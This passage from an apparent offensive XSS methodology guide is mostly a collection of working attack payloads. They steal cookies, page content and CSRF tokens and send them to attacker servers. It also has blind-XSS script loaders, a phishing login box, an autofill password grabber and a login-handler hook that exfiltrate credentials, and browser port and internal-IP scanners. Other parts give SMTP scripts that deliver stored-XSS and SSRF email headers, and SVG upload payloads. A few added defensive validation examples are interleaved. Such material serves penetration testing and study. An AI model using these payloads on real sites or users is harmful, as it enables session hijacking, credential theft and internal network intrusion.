゚Д゚[゚ε゚] +
(゚ー゚ + ゚Θ゚) +
(c ^ _ ^ o) +
゚Д゚[゚ε゚] +
゚ー゚ +
((o ^ _ ^ o) - ゚Θ゚) +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚Θ゚ +
(c ^ _ ^ o) +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚ー゚ +
(゚ー゚ + ゚Θ゚) +
゚Д゚[゚ε゚] +
゚Θ゚ +
(゚ー゚ + ゚Θ゚) +
゚ー゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
(゚ー゚ + ゚Θ゚) +
゚ー゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
(゚ー゚ + ゚Θ゚) +
(゚ー゚ + (o ^ _ ^ o)) +
゚Д゚[゚ε゚] +
(゚ー゚ + ゚Θ゚) +
゚ー゚ +
゚Д゚[゚ε゚] +
゚ー゚ +
(c ^ _ ^ o) +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚Θ゚ +
((o ^ _ ^ o) - ゚Θ゚) +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚ー゚ +
゚Θ゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚ー゚ +
゚Θ゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) - ゚Θ゚) +
(o ^ _ ^ o) +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚ー゚ +
(o ^ _ ^ o) +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
((o ^ _ ^ o) - ゚Θ゚) +
゚Д゚[゚ε゚] +
゚Θ゚ +
(゚ー゚ + ゚Θ゚) +
゚Θ゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
(c ^ _ ^ o) +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
゚ー゚ +
゚Д゚[゚ε゚] +
゚ー゚ +
((o ^ _ ^ o) - ゚Θ゚) +
゚Д゚[゚ε゚] +
(゚ー゚ + ゚Θ゚) +
゚Θ゚ +
゚Д゚[゚o゚]
)(゚Θ゚)
)("_")
// It's also possible to execute JS code only with the chars: []`+!${}
Common XSS payloads
Several payloads in 1
Iframe Trap
Make the user navigate in the page without exiting an iframe and steal their actions (including information sent in forms):
Retrieve Cookies
<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">
<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>
<script>new Audio().src="http://<IP>/?c="+escape(document.cookie);</script>
<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.write('<img src="http://<YOUR_SERVER_IP>?c='+document.cookie+'" />')</script>
<script>window.location.assign('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>window['location']['assign']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>window['location']['href']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>document.location=["http://<YOUR_SERVER_IP>?c",document.cookie].join()</script>
<script>var i=new Image();i.src="http://<YOUR_SERVER_IP>/?c="+document.cookie</script>
<script>window.location="https://<SERVER_IP>/?c=".concat(document.cookie)</script>
<script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();</script>
<script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>
<script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>
<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>
Tip
You won't be able to access the cookies from JavaScript if the HttpOnly flag is set on the cookie. But here you have some ways to bypass this protection if you are lucky enough.
Steal Page Content
var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8"
var attacker = "http://10.10.14.8/exfil"
var xhr = new XMLHttpRequest()
xhr.onreadystatechange = function () {
if (xhr.readyState == XMLHttpRequest.DONE) {
fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
}
}
xhr.open("GET", url, true)
xhr.send(null)
Find internal IPs
<script>
var q = []
var collaboratorURL =
"http://5ntrut4mpce548i2yppn9jk1fsli97.burpcollaborator.net"
var wait = 2000
var n_threads = 51
// Prepare the fetchUrl functions to access all the possible
for (i = 1; i <= 255; i++) {
q.push(
(function (url) {
return function () {
fetchUrl(url, wait)
}
})("http://192.168.0." + i + ":8080")
)
}
// Launch n_threads threads that are going to be calling fetchUrl until there is no more functions in q
for (i = 1; i <= n_threads; i++) {
if (q.length) q.shift()()
}
function fetchUrl(url, wait) {
console.log(url)
var controller = new AbortController(),
signal = controller.signal
fetch(url, { signal })
.then((r) =>
r.text().then((text) => {
location =
collaboratorURL +
"?ip=" +
url.replace(/^http:\/\//, "") +
"&code=" +
encodeURIComponent(text) +
"&" +
Date.now()
})
)
.catch((e) => {
if (!String(e).includes("The user aborted a request") && q.length) {
q.shift()()
}
})
setTimeout((x) => {
controller.abort()
if (q.length) {
q.shift()()
}
}, wait)
}
</script>
Port Scanner (fetch)
const checkPort = (port) => { fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => { let img = document.createElement("img"); img.src = `http://attacker.com/ping?port=${port}`; }); }
for(let i=0; i<1000; i++) { checkPort(i); }
Port Scanner (websockets)
var ports = [80, 443, 445, 554, 3306, 3690, 1234];
for(var i=0; i<ports.length; i++) {
var s = new WebSocket("wss://192.168.1.1:" + ports[i]);
s.start = performance.now();
s.port = ports[i];
s.onerror = function() {
console.log("Port " + this.port + ": " + (performance.now() -this.start) + " ms");
};
s.onopen = function() {
console.log("Port " + this.port+ ": " + (performance.now() -this.start) + " ms");
};
}
Short times indicate a responding port. Longer times indicate no response.
Review the list of banned ports in Chrome here and in Firefox here.
Box to ask for credentials
<style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>
Auto-fill password capture
<b>Username:</b><br>
<input name=username id=username>
<b>Password:</b><br>
<input type=password name=password onchange="if(this.value.length)fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
When any data is introduced in the password field, the username and password are sent to the attacker's server; even if the client selects a saved password and doesn't type anything, the credentials will be exfiltrated.
Hijack form handlers to exfiltrate credentials (const shadowing)
If a critical handler (e.g., function DoLogin(){...}) is declared later in the page, and your payload runs earlier (e.g., via an inline JS-in-JS sink), define a const with the same name first to pre-empt and lock the handler. Later function declarations cannot rebind a const name, leaving your hook in control:
const DoLogin = () => {
const pwd = Trim(FormInput.InputPassword.value);
const user = Trim(FormInput.InputUtente.value);
fetch('https://attacker.example/?u='+encodeURIComponent(user)+'&p='+encodeURIComponent(pwd));
};
Notes
- This depends on execution order: your injection must run before the legitimate declaration.
- If your payload is wrapped in eval(...), const/let bindings will not become globals. Use the dynamic <script> injection technique from the "Deliverable payloads with eval(atob()) and scope nuances" section to ensure a real global, non-rebindable binding.
- When keyword filters block code, combine with Unicode-escaped identifiers or eval(atob('...')) delivery, as mentioned above.
Keylogger
Just searching in github I found a few different ones:
- https://github.com/JohnHoder/Javascript-Keylogger
- https://github.com/rajeshmajumdar/keylogger
- https://github.com/hakanonymos/JavascriptKeylogger
- You can also use metasploit http_javascript_keylogger
Stealing CSRF tokens
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/email',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/email/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>
Stealing PostMessage messages
<img src="https://attacker.com/?" id=message>
<script>
window.onmessage = function(e){
document.getElementById("message").src += "&"+e.data;
}
</script>
PostMessage-origin script loaders (opener-gated)
If a page stores event.origin from postMessage and later concatenates it into a script URL, the sender controls the origin of the loaded JS:
window.addEventListener('message', (event) => {
if (event.data.msg_type === 'IWL_BOOTSTRAP') {
localStorage.setItem('CFG', {host: event.origin, pixelID: event.data.pixel_id});
startIWL(); // later loads `${host}/sdk/${pixelID}/iwl.js`
}
});
Exploitation recipe (from CAPIG):
- Gates: only fires when window.opener is present and pixel_id is in the allowlist; the origin is never checked.
- Use a CSP-allowed origin: pivot to a domain already permitted by the victim CSP (e.g., logged-out help pages allowing analytics like *.THIRD-PARTY.com) and host /sdk/<pixel_id>/iwl.js there via takeover/XSS/upload.
- Restore opener: in Android WebView, window.name='x'; window.open(target,'x') makes the page its own opener; send the malicious postMessage from a hijacked iframe.
- Trigger: the iframe posts {msg_type:'IWL_BOOTSTRAP', pixel_id:<allowed>}; the parent then loads the attacker's iwl.js from the CSP-allowed origin and runs it.
This turns origin-less postMessage validation into a remote script loader primitive that survives CSP if you can land on any origin already allowed by the policy.
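Added example (not the page's or the vendor's code): the bootstrap listener quoted above next to a version that gates on an explicit origin allowlist and an exact pixel_id match, so the message sender can no longer choose the script host. The message field names follow the snippet on the page; the allowlists and sample events are constructed.

```javascript
// Added example (not the page's code): fixing an origin-less postMessage
// bootstrap. The vulnerable shape records event.origin and later uses it as
// the host of a script it loads; the hardened shape only accepts a message
// from a known origin and builds the URL from that allowlisted value.

const ALLOWED_ORIGINS = new Set(["https://sdk.example.com"]); // constructed
const ALLOWED_PIXEL_IDS = new Set(["123456"]);                // constructed

// Vulnerable: origin is stored, never checked, and becomes a script host.
function bootstrapUnsafe(event) {
  if (event.data && event.data.msg_type === "IWL_BOOTSTRAP") {
    return { host: event.origin, pixelID: event.data.pixel_id };
  }
  return null;
}

// Hardened: origin must be allowlisted (exact string match, no regex),
// pixel_id must be exactly allowlisted, everything else is dropped.
// Note that window.opener being present is not a security check at all.
function bootstrapSafe(event) {
  if (!event || typeof event.origin !== "string") return null;
  if (!ALLOWED_ORIGINS.has(event.origin)) return null;
  const data = event.data;
  if (!data || data.msg_type !== "IWL_BOOTSTRAP") return null;
  const pixelID = String(data.pixel_id);
  if (!ALLOWED_PIXEL_IDS.has(pixelID)) return null;
  return { host: event.origin, pixelID };
}

// The script URL is derived only from values that passed the allowlists.
function sdkUrl(cfg) {
  return `${cfg.host}/sdk/${encodeURIComponent(cfg.pixelID)}/iwl.js`;
}

// Constructed sample events: the expected SDK origin, and an unrelated origin
// that a broad CSP happens to permit (the pivot described above).
const GOOD_EVENT = {
  origin: "https://sdk.example.com",
  data: { msg_type: "IWL_BOOTSTRAP", pixel_id: "123456" },
};
const ROGUE_EVENT = {
  origin: "https://cdn.third-party.example",
  data: { msg_type: "IWL_BOOTSTRAP", pixel_id: "123456" },
};
```

CSP does not rescue the vulnerable form: the attack works precisely because the rogue origin is already in `script-src`, so the origin check has to happen in the listener itself.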
Supply-chain stored XSS via backend JS concatenation
When a backend builds a shared SDK by concatenating JS strings with user-controlled values, any quote/structure breaker can inject script that is served to every consumer:
- Example pattern (Meta CAPIG): server appends cbq.config.set("<pixel>","IWLParameters",{params: <user JSON>}); directly into capig-events.js.
- Injecting 'or"]} closes the literal/object and adds attacker JS, creating stored XSS in the distributed SDK for every site that loads it (first-party and third-party).
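Added example (not the page's or the vendor's code): the concatenating SDK builder described above beside a version that parses the stored value as JSON, re-serialises it, and escapes the characters that are legal in JSON but dangerous inside a script body. The `cbq.config.set` call shape is the one quoted above; the helper names and sample inputs are constructed.

```javascript
// Added example (not the page's code): safe embedding of user-supplied data
// in generated JavaScript.

// Vulnerable: whatever the user stored is pasted into the JS file verbatim,
// so a quote or brace in it terminates the literal and the rest is code.
function buildSdkUnsafe(pixel, userJsonText) {
  return `cbq.config.set("${pixel}","IWLParameters",{params: ${userJsonText}});\n`;
}

// JSON.stringify output that is safe to embed in a <script> body: "<" and ">"
// stop "</script" from closing the tag, "&" is escaped for HTML contexts, and
// U+2028/U+2029 are line terminators that older JS engines treat as newlines.
function toSafeJsLiteral(value) {
  return JSON.stringify(value).replace(/[<>&\u2028\u2029]/g, (c) =>
    "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Hardened: pixel id validated against a strict shape, user data parsed as
// JSON (anything else is rejected) and re-serialised as a literal.
function buildSdkSafe(pixel, userJsonText) {
  if (!/^[0-9]{1,20}$/.test(pixel)) throw new Error("invalid pixel id");
  let params;
  try {
    params = JSON.parse(userJsonText);
  } catch {
    throw new Error("params must be JSON");
  }
  if (params === null || typeof params !== "object" || Array.isArray(params)) {
    throw new Error("params must be a JSON object");
  }
  return `cbq.config.set(${toSafeJsLiteral(pixel)},"IWLParameters",{params: ${toSafeJsLiteral(params)}});\n`;
}

// Constructed samples: a stored value that closes the object and appends
// code, and a benign-but-awkward object with a script terminator inside.
const ROGUE_PARAMS = '{"a":1}});alert(document.domain);//';
const BENIGN_PARAMS = '{"tag":"</script><script>x","note":"line\u2028break"}';
```

The parse-then-serialise step is what makes the difference: a value that is not valid JSON never reaches the output, and one that is valid JSON is emitted as a single literal whose only special characters have been escaped.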
Stored XSS in generated reports when escaping is disabled
If uploaded files are parsed and their metadata is printed into HTML reports with escaping disabled (|safe, custom renderers), that metadata is a stored XSS sink. Example flow:
xmlhost = data.getAttribute(f'{ns}:host')
ret_list.append(('dialer_code_found', (xmlhost,), ()))
'title': a_template['title'] % t_name # %s fed by xmlhost
The Django template renders {{item|key:"title"|safe}}, so the attacker's HTML executes.
Exploit: put entity-encoded HTML in any manifest/config field that reaches the report:
<data android:scheme="android_secret_code"
android:host="<img src=x onerror=alert(document.domain)>"/>
Rendered with |safe, the report shows the <img ...> and triggers JS execution when it is viewed.
Detection: look for report/notification builders that reuse parsed fields in %s/f-strings and disable auto-escaping. A single encoding-hidden tag in an uploaded manifest/log/archive persists as XSS for every viewer.
Abusing Service Workers
Accessing Shadow DOM
Polyglots
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss_polyglots.txt
Blind XSS payloads
You can also use: https://xsshunter.com/
"><img src='//domain/xss'>
"><script src="//domain/xss.js"></script>
><a href="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">Click Me For An Awesome Time</a>
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//0mnb1tlfl5x4u55yfb57dmwsajgd42.burpcollaborator.net/scriptb");a.send();</script>
<!-- html5sec - Self-executing focus event via autofocus: -->
"><input onfocus="eval('d=document; _ = d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')" autofocus>
<!-- html5sec - JavaScript execution via iframe and onload -->
"><iframe onload="eval('d=document; _=d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')">
<!-- html5sec - SVG tags allow code to be executed with onload without any other elements. -->
"><svg onload="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')" xmlns="http://www.w3.org/2000/svg"></svg>
<!-- html5sec - allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags -->
"><video><source onerror="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">
<!-- html5sec - eventhandler - element fires an "onpageshow" event without user interaction on all modern browsers. This can be abused to bypass blacklists as the event is not very well known. -->
"><body onpageshow="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">
<!-- xsshunter.com - Sites that use JQuery -->
<script>$.getScript("//domain")</script>
<!-- xsshunter.com - When <script> is filtered -->
"><img src=x id=payload== onerror=eval(atob(this.id))>
<!-- xsshunter.com - Bypassing poorly designed systems with autofocus -->
"><input onfocus=eval(atob(this.id)) id=payload== autofocus>
<!-- noscript trick -->
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
<!-- whitelisted CDNs in CSP -->
"><script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.1/angular.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js"></script>
<!-- ... add more CDNs, you'll get WARNING: Tried to load angular more than once if multiple load. but that does not matter you'll get a HTTP interaction/exfiltration :-]... -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
<!-- Payloads from https://www.intigriti.com/researchers/blog/hacking-tools/hunting-for-blind-cross-site-scripting-xss-vulnerabilities-a-complete-guide -->
<!-- Image tag -->
'"><img src="x" onerror="eval(atob(this.id))" id="Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw==">
<!-- Input tag with autofocus -->
'"><input autofocus onfocus="eval(atob(this.id))" id="Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw==">
<!-- In case jQuery is loaded, we can make use of the getScript method -->
'"><script>$.getScript("{SERVER}/script.js")</script>
<!-- Make use of the JavaScript protocol (applicable in cases where your input lands into the "href" attribute or a specific DOM sink) -->
javascript:eval(atob("Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw=="))
<!-- Render an iframe to validate your injection point and receive a callback -->
'"><iframe src="{SERVER}"></iframe>
<!-- Bypass certain Content Security Policy (CSP) restrictions with a base tag -->
<base href="{SERVER}" />
<!-- Make use of the meta-tag to initiate a redirect -->
<meta http-equiv="refresh" content="0; url={SERVER}" />
<!-- In case your target makes use of AngularJS -->
{{constructor.constructor("import('{SERVER}/script.js')")()}}
Regex - Accessing Hidden Content
From this writeup it is possible to learn that even if some values disappear from JS, it is still possible to find them in JS attributes of different objects. For example, the input of a REGEX can still be recovered after the value of the regex input has been removed:
```javascript
// Do regex with flag
flag = "CTF{FLAG}"
re = /./g
re.test(flag)
// Remove flag value, nobody will be able to get it, right?
flag = ""
// Access previous regex input
console.log(RegExp.input)
console.log(RegExp.rightContext)
console.log(
  document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["rightContext"]
)
```
Brute-Force List
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt
XSS Abusing other vulnerabilities
XSS in Markdown
Can you inject Markdown code that will be rendered? Maybe you can get XSS! Check:
XSS to SSRF
Did you find XSS on a site that uses caching? Try to upgrade it to SSRF through Edge Side Include Injection with this payload:
```html
<esi:include src="http://yoursite.com/capture" />
```
Use it to bypass cookie restrictions, XSS filters and more!
More information about this technique here: XSLT.
XSS in dynamically created PDF
If a web page creates a PDF from user-controlled input, you can try to trick the bot that creates the PDF into executing arbitrary JS code.
So, if the PDF creator bot finds some kind of HTML tags, it is going to interpret them, and you can abuse this behaviour to cause a Server XSS.
If you cannot inject HTML tags it may be worth trying to inject PDF data:
XSS in Amp4Email
AMP, aimed at accelerating web page performance on mobile devices, incorporates HTML tags complemented by JavaScript to ensure functionality with a focus on speed and security. It supports a range of components for various features, accessible via AMP components.
The AMP for Email format extends specific AMP components to emails, enabling recipients to interact with content directly within their emails.
Example writeup XSS in Amp4Email in Gmail.
List-Unsubscribe Header Abuse (Webmail XSS & SSRF)
The RFC 2369 List-Unsubscribe header embeds attacker-controlled URIs that many webmail and mail clients automatically convert into “Unsubscribe” buttons. When those URIs are rendered or fetched without validation, the header becomes an injection point for both stored XSS (if the unsubscribe link is placed in the DOM) and SSRF (if the server performs the unsubscribe request on behalf of the user).
Stored XSS via javascript: URIs
- Send yourself an email where the header points to a `javascript:` URI while keeping the rest of the message benign so that spam filters do not drop it.
- Ensure the UI renders the value (many clients show it in a "List Info" pane) and check whether the resulting `<a>` tag inherits attacker-controlled attributes such as `href` or `target`.
- Trigger execution (e.g., CTRL+click, middle-click, or "open in new tab") when the link uses `target="_blank"`; browsers will evaluate the supplied JavaScript in the origin of the webmail application.
- Observe the stored-XSS primitive: the payload persists with the email and only requires a click to execute.
```text
List-Unsubscribe: <javascript://attacker.tld/%0aconfirm(document.domain)>
List-Unsubscribe-Post: List-Unsubscribe=One-Click
```
The newline byte (%0a) in the URI shows that even unusual characters survive the rendering pipeline on vulnerable clients such as Horde IMP H5, which output the string verbatim inside the anchor tag.
Minimal SMTP PoC delivering a malicious List-Unsubscribe header
```python
#!/usr/bin/env python3
import smtplib
from email.message import EmailMessage

smtp_server = "mail.example.org"
smtp_port = 587
smtp_user = "user@example.org"
smtp_password = "REDACTED"
sender = "list@example.org"
recipient = "victim@example.org"

msg = EmailMessage()
msg.set_content("Testing List-Unsubscribe rendering")
msg["From"] = sender
msg["To"] = recipient
msg["Subject"] = "Newsletter"
msg["List-Unsubscribe"] = "javascript://evil.tld/%0aconfirm(document.domain)"
msg["List-Unsubscribe-Post"] = "List-Unsubscribe=One-Click"

with smtplib.SMTP(smtp_server, smtp_port) as smtp:
    smtp.starttls()
    smtp.login(smtp_user, smtp_password)
    smtp.send_message(msg)
```
#### Server-side unsubscribe proxies -> SSRF
Some clients, such as the Nextcloud Mail app, proxy the unsubscribe action server-side: clicking the button makes the server fetch the supplied URL itself. This turns the header into an SSRF primitive, especially when administrators have set `'allow_local_remote_servers' => true` (documented in [HackerOne report 2902856](https://hackerone.com/reports/2902856)), which allows requests towards loopback and RFC1918 ranges.
1. **Craft an email** whose `List-Unsubscribe` targets an attacker-controlled endpoint (use Burp Collaborator / OAST for blind SSRF).
2. **Set `List-Unsubscribe-Post: List-Unsubscribe=One-Click`** so the UI shows a one-click unsubscribe button.
3. **Satisfy the trust requirements**: Nextcloud, for example, only performs HTTPS unsubscribe requests when the message passes DKIM, so the attacker must sign the email with a domain they control.
4. **Send the message to a mailbox processed by the target server** and wait until the user clicks the unsubscribe button.
5. **Check for the server-side callback** on the collaborator endpoint, then pivot to internal addresses once the primitive is confirmed.
```text
List-Unsubscribe: <http://abcdef.oastify.com>
List-Unsubscribe-Post: List-Unsubscribe=One-Click
```
DKIM-signed List-Unsubscribe message for SSRF testing
```python
#!/usr/bin/env python3
import smtplib
from email.message import EmailMessage
import dkim  # dkimpy

smtp_server = "mail.example.org"
smtp_port = 587
smtp_user = "user@example.org"
smtp_password = "REDACTED"
dkim_selector = "default"
dkim_domain = "example.org"
dkim_private_key = """-----BEGIN PRIVATE KEY-----\n...\n-----END PRIVATE KEY-----"""

msg = EmailMessage()
msg.set_content("One-click unsubscribe test")
msg["From"] = "list@example.org"
msg["To"] = "victim@example.org"
msg["Subject"] = "Mailing list"
msg["List-Unsubscribe"] = "http://abcdef.oastify.com"
msg["List-Unsubscribe-Post"] = "List-Unsubscribe=One-Click"

raw = msg.as_bytes()
signature = dkim.sign(
    message=raw,
    selector=dkim_selector.encode(),
    domain=dkim_domain.encode(),
    privkey=dkim_private_key.encode(),
    include_headers=["From", "To", "Subject"],
)
# dkim.sign() returns the full "DKIM-Signature: ..." header line; keep only the value
msg["DKIM-Signature"] = signature.decode().split(": ", 1)[1].replace("\r", "").replace("\n", "")

with smtplib.SMTP(smtp_server, smtp_port) as smtp:
    smtp.starttls()
    smtp.login(smtp_user, smtp_password)
    smtp.send_message(msg)
```
**Testing notes**
- Use an OAST endpoint to collect blind SSRF hits, then adjust the `List-Unsubscribe` URL to target `http://127.0.0.1:PORT`, metadata services, or other internal hosts once the technique is confirmed.
- Because the unsubscribe helper often reuses the same HTTP stack as the application, you inherit its proxy settings, HTTP verbs, and header rewrites, which enables the additional traversal techniques described in the [SSRF methodology](../ssrf-server-side-request-forgery/README.md).
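A defender-side check covering both abuses of this header described above (a `javascript:` URI rendered as a link, and a server-side unsubscribe helper fetching an internal target), written as an added Python example that is not part of the original page or of any of the webmail clients named. The helper names (`validate_unsubscribe_uri`, `check_header`, `is_internal_ip`) are assumptions for the example and only the standard library is used; hostnames are deliberately not DNS-resolved here, so a production helper would also resolve the name and apply `is_internal_ip` to every returned address before connecting.

```python
import ipaddress
import re
from urllib.parse import unquote, urlsplit

# Schemes a List-Unsubscribe link may legitimately use (RFC 2369 lists http and mailto)
ALLOWED_SCHEMES = {"http", "https", "mailto"}


def parse_list_unsubscribe(header_value):
    """Split an RFC 2369 List-Unsubscribe value into its angle-bracketed URIs."""
    return [u.strip() for u in re.findall(r"<([^>]*)>", header_value)]


def is_internal_ip(host):
    """True if host is an IP literal in loopback, private, link-local or other
    non-routable space. Hostnames are not resolved here (see lead-in)."""
    try:
        ip = ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        return False
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def validate_unsubscribe_uri(uri, for_server_fetch=False):
    """Return (ok, reason).

    Default rules protect a UI that turns the URI into an <a href>:
    only http/https/mailto, and no control characters even after %-decoding.
    for_server_fetch=True adds the rules a server-side unsubscribe helper
    should enforce before issuing the request itself: https only, and no
    loopback/private/link-local targets.
    """
    scheme = urlsplit(uri).scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {scheme or '(none)'}"
    decoded = unquote(uri)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in decoded):
        return False, "control character in URI after percent-decoding"
    if scheme == "mailto":
        if for_server_fetch:
            return False, "mailto targets cannot be fetched server-side"
        return True, "ok"
    parts = urlsplit(uri)
    if not parts.hostname:
        return False, "missing host"
    if for_server_fetch:
        if scheme != "https":
            return False, "server-side fetch requires https"
        if is_internal_ip(parts.hostname):
            return False, "target is internal address space"
    return True, "ok"


def check_header(header_value, for_server_fetch=False):
    """Validate every URI in a header value; returns [(uri, ok, reason), ...]."""
    return [(u, *validate_unsubscribe_uri(u, for_server_fetch))
            for u in parse_list_unsubscribe(header_value)]


if __name__ == "__main__":
    # Constructed header values modelled on the two cases discussed above
    for hdr, server_side in [
        ("<javascript://attacker.tld/%0aconfirm(document.domain)>", False),
        ("<http://abcdef.oastify.com>", True),
        ("<https://127.0.0.1:8080/unsub>", True),
        ("<mailto:unsub@example.org>, <https://lists.example.org/unsub?id=1>", False),
    ]:
        for uri, ok, reason in check_header(hdr, server_side):
            print(f"{'ALLOW' if ok else 'DENY '} {uri}  ({reason})")
```

The ordering matters: the scheme is checked before the URI is percent-decoded, so a `javascript:` link is rejected on its own merits and `%0a` is only inspected once the scheme is plausible. A client that renders the link should additionally set `rel="noopener noreferrer"` on the generated anchor; a client that fetches it should pass the DKIM check as a necessary condition, not a sufficient one, since a signed message from an attacker's own domain still reaches the fetch step.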
### XSS uploading files (svg)
Upload as an image a file like the following (from [http://ghostlulz.com/xss-svg/](http://ghostlulz.com/xss-svg/)):
```html
Content-Type: multipart/form-data; boundary=---------------------------232181429808
Content-Length: 574
-----------------------------232181429808
Content-Disposition: form-data; name="img"; filename="img.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(1);
</script>
</svg>
-----------------------------232181429808--
```
```html
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">alert("XSS")</script>
</svg>
```
```html
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS");
</script>
</svg>
```
```html
<svg width="500" height="500"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>
<foreignObject width="500" height="500">
<iframe xmlns="http://www.w3.org/1999/xhtml" src="data:text/html,<body><script>document.body.style.background="red"</script>hi</body>" width="400" height="250"/>
<iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:document.write('hi');" width="400" height="250"/>
</foreignObject>
</svg>
```
```html
<svg><use href="//portswigger-labs.net/use_element/upload.php#x" /></svg>
